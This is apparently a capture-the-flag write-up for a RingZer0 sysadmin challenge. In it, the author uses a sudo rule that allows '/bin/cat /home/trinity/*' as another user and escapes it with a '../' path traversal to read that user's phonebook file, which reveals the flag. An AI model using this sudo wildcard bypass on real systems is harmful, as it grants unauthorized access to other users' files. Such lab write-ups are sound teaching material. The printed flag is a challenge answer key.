login as: trinity
trinity@challenges.ringzer0team.com's password:
 888888ba  oo                   d8888888P                    a8888a  d888888P
 88     8b                           .d8'                   d8    8b    88
 88aaaa8P  dP 88d888b. .d8888b.    .d8'   .d8888b. 88d888b. 88  P 88    88    .d8888b. .d8888b. 88d8b.d8b.
 88    8b. 88 88    88 88    88  .d8'     88ooood8 88    88 88 d  88    88    88ooood8 88    88 88  88  88
 88     88 88 88    88 88    88 d8'       88.  ... 88       Y8    8P    88    88.  ... 88    88 88  88  88
 dP     dP dP dP    dP `8888P88 Y8888888P `88888P' dP        Y8888P     dP    `88888P' `88888P8 dP  dP  dP
oooooooooooooooooooooooo     88 ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
                        d8888P

                                    +---------------------------------+
                                    |  Welcome to the Sysadmin track  |
                                    |                                 |
                                    |   - Play nice and play Fair -   |
                                    |                                 |
                                    |----[ info@ringzer0team.com ]----|
trinity@lxc-sysadmin:~$ ls -ltra
total 24
-r-xr-x--- 1 trinity neo   674 May 30  2018 .profile
-r-xr-x--- 1 trinity neo  2632 May 30  2018 .bashrc
-r-xr-x--- 1 trinity neo   252 May 30  2018 .bash_logout
drwxr-xr-x 8 root    root 4096 May 30  2018 ..
lrwxrwxrwx 1 trinity neo     9 Jun  3  2018 .bash_history -> /dev/null
-r-xr-x--- 1 trinity neo   124 Aug 23  2018 phonebook
lrwxrwxrwx 1 root    root    9 Oct 17  2018 .mysql_history -> /dev/null
dr-xr-x--- 2 trinity neo  4096 Oct 17  2018 .
=> After trying to cat everything in home directory, there's "phonebook" interests me:
trinity@lxc-sysadmin:~$ cat phonebook
The Oracle        1800-133-7133
Persephone        345-555-1244





copy made by Cypher copy utility on /home/neo/phonebook
=> This, could be something. Yet it might be another version of this file inside /home/neo/phonebook, but we cannot read it at first hand because it is owned by Neo.
As I bought the Hint: " sudo make me a sandwich ", I know i have been stupidity looking all over other folder/file/permission without thinking a straight way: execute the /home/neo/phonebook as Neo.
But first, let's check the trinity su first.

trinity@lxc-sysadmin:~$ sudo -l
[sudo] password for trinity:
Matching Defaults entries for trinity on lxc-sysadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User trinity may run the following commands on lxc-sysadmin:
    (neo) /bin/cat /home/trinity/*

=> So we can do read a file as neo on folder: /home/trinity/*
BUT, it is still NOT the folder /home/neo which is contains the "phonebook" file we need to read.
After thinking around, i have an idea: Why don't we trick the system that, we go to /home/trinity/ and then we back around to /home/neo since it has the same starting point?
Great! Let's try it:
trinity@lxc-sysadmin:~$ sudo -u neo /bin/cat /home/trinity/../neo/phonebook
The Oracle        1800-133-7133
Persephone        345-555-1244




change my current password FLAG-314df4d411ae37f16f590f65da99f3b6
don't forget to remove this :)

WOW, IT WORKS !!!
Worth a hint for me :)
=> FLAG-314df4d411ae37f16f590f65da99f3b6